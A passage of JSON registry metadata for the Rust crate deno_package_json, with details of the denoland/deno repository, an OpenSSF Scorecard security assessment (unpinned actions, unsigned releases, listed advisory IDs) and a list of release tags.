CLI","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":68,"first_release_published_at":"2024-07-23T15:19:28.991Z","latest_release_published_at":"2026-08-27T15:19:28.652Z","latest_release_number":"0.60.0","last_synced_at":"2026-09-07T22:54:26.456Z","created_at":"2024-08-06T05:58:15.401Z","updated_at":"2026-09-07T22:54:26.457Z","registry_url":"https://crates.io/crates/deno_package_json/","install_command":"cargo install deno_package_json","documentation_url":"https://docs.rs/deno_package_json/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifes